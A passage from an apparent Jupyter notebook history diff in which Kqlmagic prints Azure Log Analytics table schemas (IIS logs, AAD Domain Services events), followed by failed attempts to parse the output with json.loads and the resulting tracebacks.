\u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DataType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"IsBillable\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"LinkedMeterId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LinkedResourceUri\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MeterId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Quantity\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"QuantityUnit\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceUri\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Solution\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TotalBatches\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"W3CIISLog\"\u001b[39;49;00m: {\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Confidence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FirstReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsActive\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RoleInstance\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Severity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StorageAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TLPLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeTaken\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"cIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"csCookie\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csHost\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csReferer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUriQuery\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUriStem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"sIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"sPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"sSiteName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"scBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"scStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"scSubStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"scWin32Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    }\n}"
+       },
+       "execution_count": 16,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql --schema"
+    },
+    "executionTime": "2019-08-15T21:18:22.961Z"
+   },
+   {
+    "cell": {
+     "executionCount": 17,
+     "executionEventId": "6b017dc4-d5db-44f1-a55c-4048520f31e5",
+     "hasError": false,
+     "id": "0f4c4710-bcbb-4c1f-a7b6-409f6abf757c",
+     "outputs": [],
+     "persistentId": "eb7a9a2f-a277-426b-a95c-e1aeb03864ac",
+     "text": "k_schema = _"
+    },
+    "executionTime": "2019-08-15T21:18:35.691Z"
+   },
+   {
+    "cell": {
+     "executionCount": 18,
+     "executionEventId": "33087003-f376-4bf0-a982-dccf838a2a52",
+     "hasError": false,
+     "id": "0f4c4710-bcbb-4c1f-a7b6-409f6abf757c",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "Kqlmagic.display.FormattedJsonDict"
+       },
+       "execution_count": 18,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "eb7a9a2f-a277-426b-a95c-e1aeb03864ac",
+     "text": "type(k_schema)"
+    },
+    "executionTime": "2019-08-15T21:18:50.476Z"
+   },
+   {
+    "cell": {
+     "executionCount": 19,
+     "executionEventId": "fcb424f4-498b-42d3-b972-7a266bdcbd21",
+     "hasError": true,
+     "id": "0f4c4710-bcbb-4c1f-a7b6-409f6abf757c",
+     "outputs": [
+      {
+       "ename": "SyntaxError",
+       "evalue": "unexpected EOF while parsing (<ipython-input-19-7ad1327feb52>, line 3)",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;36m  File \u001b[1;32m\"<ipython-input-19-7ad1327feb52>\"\u001b[1;36m, line \u001b[1;32m3\u001b[0m\n\u001b[1;33m    (json.loads(str(k_schema))\u001b[0m\n\u001b[1;37m                              ^\u001b[0m\n\u001b[1;31mSyntaxError\u001b[0m\u001b[1;31m:\u001b[0m unexpected EOF while parsing\n"
+       ]
+      }
+     ],
+     "persistentId": "eb7a9a2f-a277-426b-a95c-e1aeb03864ac",
+     "text": "import json\n\n(json.loads(str(k_schema))"
+    },
+    "executionTime": "2019-08-15T21:19:30.874Z"
+   },
+   {
+    "cell": {
+     "executionCount": 20,
+     "executionEventId": "07593d26-77e1-4e8d-8215-611538f357a1",
+     "hasError": true,
+     "id": "0f4c4710-bcbb-4c1f-a7b6-409f6abf757c",
+     "outputs": [
+      {
+       "ename": "JSONDecodeError",
+       "evalue": "Expecting property name enclosed in double quotes: line 2 column 5 (char 6)",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mJSONDecodeError\u001b[0m                           Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-20-5e59d9c1dcf4>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      1\u001b[0m \u001b[1;32mimport\u001b[0m \u001b[0mjson\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      2\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 3\u001b[1;33m \u001b[0mjson\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mloads\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mstr\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mk_schema\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\envs\\condadev\\lib\\json\\__init__.py\u001b[0m in \u001b[0;36mloads\u001b[1;34m(s, encoding, cls, object_hook, parse_float, parse_int, parse_constant, object_pairs_hook, **kw)\u001b[0m\n\u001b[0;32m    346\u001b[0m             \u001b[0mparse_int\u001b[0m \u001b[1;32mis\u001b[0m \u001b[1;32mNone\u001b[0m \u001b[1;32mand\u001b[0m \u001b[0mparse_float\u001b[0m \u001b[1;32mis\u001b[0m \u001b[1;32mNone\u001b[0m \u001b[1;32mand\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    347\u001b[0m             parse_constant is None and object_pairs_hook is None and not kw):\n\u001b[1;32m--> 348\u001b[1;33m         \u001b[1;32mreturn\u001b[0m \u001b[0m_default_decoder\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdecode\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0ms\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    349\u001b[0m     \u001b[1;32mif\u001b[0m \u001b[0mcls\u001b[0m \u001b[1;32mis\u001b[0m \u001b[1;32mNone\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    350\u001b[0m         \u001b[0mcls\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mJSONDecoder\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\envs\\condadev\\lib\\json\\decoder.py\u001b[0m in \u001b[0;36mdecode\u001b[1;34m(self, s, _w)\u001b[0m\n\u001b[0;32m    335\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    336\u001b[0m         \"\"\"\n\u001b[1;32m--> 337\u001b[1;33m         \u001b[0mobj\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mend\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mraw_decode\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0ms\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0midx\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0m_w\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0ms\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;36m0\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mend\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    338\u001b[0m         \u001b[0mend\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0m_w\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0ms\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mend\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mend\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    339\u001b[0m         \u001b[1;32mif\u001b[0m \u001b[0mend\u001b[0m \u001b[1;33m!=\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0ms\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\envs\\condadev\\lib\\json\\decoder.py\u001b[0m in \u001b[0;36mraw_decode\u001b[1;34m(self, s, idx)\u001b[0m\n\u001b[0;32m    351\u001b[0m         \"\"\"\n\u001b[0;32m    352\u001b[0m         \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 353\u001b[1;33m             \u001b[0mobj\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mend\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mscan_once\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0ms\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0midx\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    354\u001b[0m         \u001b[1;32mexcept\u001b[0m \u001b[0mStopIteration\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merr\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    355\u001b[0m             \u001b[1;32mraise\u001b[0m \u001b[0mJSONDecodeError\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m\"Expecting value\"\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0ms\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0merr\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalue\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mfrom\u001b[0m \u001b[1;32mNone\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mJSONDecodeError\u001b[0m: Expecting property name enclosed in double quotes: line 2 column 5 (char 6)"
+       ]
+      }
+     ],
+     "persistentId": "eb7a9a2f-a277-426b-a95c-e1aeb03864ac",
+     "text": "import json\n\njson.loads(str(k_schema))"
+    },
+    "executionTime": "2019-08-15T21:19:39.300Z"
+   },
+   {
+    "cell": {
+     "executionCount": 21,
+     "executionEventId": "52fe5d86-7e51-4ada-b2f0-dee95f64cc35",
+     "hasError": false,
+     "id": "0f4c4710-bcbb-4c1f-a7b6-409f6abf757c",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "{\n    \u001b[94m\"AADDomainServicesAccountLogon\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertIssuerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertSerialNumber\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertThumbprint\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureCode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MappedName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MappingBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PreAuthType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TicketOptions\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesAccountManagement\"\u001b[39;49;00m: {\n        \u001b[94m\"AccountExpires\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AllowedToDelegateTo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerAccountChange\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DnsHostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupTypeChange\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomeDirectory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonHours\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MembershipExpirationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"NewTargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldTargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordLastSet\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrimaryGroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProfilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SamAccountName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScriptPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServicePrincipalNames\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidHistory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAccountControl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserPrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserWorkstations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Workstation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesDirectoryServiceAccess\"\u001b[39;49;00m: {\n        \u001b[94m\"AppCorrelationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AttributeLDAPDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AttributeSyntaxOID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AttributeValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DSName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DSType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewObjectDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectClass\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectGUID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldObjectDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpCorrelationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TreeDelete\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesLogonLogoff\"\u001b[39;49;00m: {\n        \u001b[94m\"AuthenticationPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevatedToken\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ImpersonationLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeyLength\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"LmPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RestrictedAdminMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        